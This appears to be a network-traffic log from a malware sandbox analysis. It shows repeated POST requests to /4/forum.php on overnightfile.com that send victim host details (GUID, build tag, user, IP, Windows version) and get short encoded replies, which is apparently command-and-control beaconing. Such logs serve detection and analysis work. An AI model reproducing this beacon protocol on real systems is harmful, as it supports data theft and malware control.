                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:05.267096996 CEST796INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 46 55 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGFUTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.559700012 CEST796OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:05.653503895 CEST796INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGAZTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:05.965733051 CEST797OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:06.053298950 CEST  797  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cCZAXARRABw==0
Jul 14, 2020 11:21:06.352188110 CEST  798  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:06.443144083 CEST  798  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cMGTNARRABw==0
Jul 14, 2020 11:21:06.757255077 CEST  799  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:06.845221043 CEST  799  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cYYBBARRABw==0
Jul 14, 2020 11:21:07.170154095 CEST  800  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:07.261219978 CEST  800  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:06 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cZJQAARRABw==0
Jul 14, 2020 11:21:07.583682060 CEST  800  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:07.677033901 CEST  801  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cNGTMARRABw==0
Jul 14, 2020 11:21:08.011208057 CEST  801  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:08.099565983 CEST  801  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:07 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cMBYNARRABw==0
Jul 14, 2020 11:21:08.460201025 CEST  802  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:08.553215027 CEST  802  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cQZAJARRABw==0
Jul 14, 2020 11:21:08.942475080 CEST  802  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:09.033268929 CEST  803  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cZGTAARRABw==0
Jul 14, 2020 11:21:09.489628077 CEST  803  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:09.580629110 CEST  803  IN  HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cFQJUARRABw==0
Jul 14, 2020 11:21:09.875055075 CEST  804  OUT  POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:09.963622093 CEST | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:10.329473019 CEST | 805 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:10.419209003 CEST | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cTTGGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:10.738768101 CEST | 805 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:10.827363968 CEST | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cJKPQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.152817965 CEST | 806 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:11.241822004 CEST | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cZMNAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.548130989 CEST | 807 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:11.638955116 CEST | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cVZAEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:11.986920118 CEST | 807 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:12.075288057 CEST | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cZZAAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:12.376663923 CEST | 808 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:12.464622974 CEST | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cTCXGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:12.955755949 CEST | 809 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:13.046689034 CEST | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cYNMBARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:13.388264894 CEST | 810 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:13.479176998 CEST | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Ascii: cJJQQARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:13.928440094 CEST | 810 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:14.019418001 CEST | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
Data Ascii: cGZATARRABw==0
Jul 14, 2020 11:21:14.396789074 CEST 811 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:14.489926100 CEST 811 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cBHSYARRABw==0
Jul 14, 2020 11:21:15.137546062 CEST 812 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:15.231205940 CEST 812 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cZFUAARRABw==0
Jul 14, 2020 11:21:15.920120001 CEST 813 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:16.016776085 CEST 813 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cQTGJARRABw==0
Jul 14, 2020 11:21:16.324270964 CEST 813 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:16.419513941 CEST 814 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cHAZSARRABw==0
Jul 14, 2020 11:21:16.756951094 CEST 814 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:16.848412991 CEST 814 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cFNMUARRABw==0
Jul 14, 2020 11:21:17.157701969 CEST 815 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:17.248116970 CEST 815 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cVHSEARRABw==0
Jul 14, 2020 11:21:17.539499998 CEST 815 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:17.629945993 CEST 816 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cTBYGARRABw==0
Jul 14, 2020 11:21:17.947969913 CEST 816 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:18.045984030 CEST 816 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cGJQTARRABw==0
Jul 14, 2020 11:21:18.495517969 CEST 817 OUT POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:18.591042995 CEST 817 IN HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
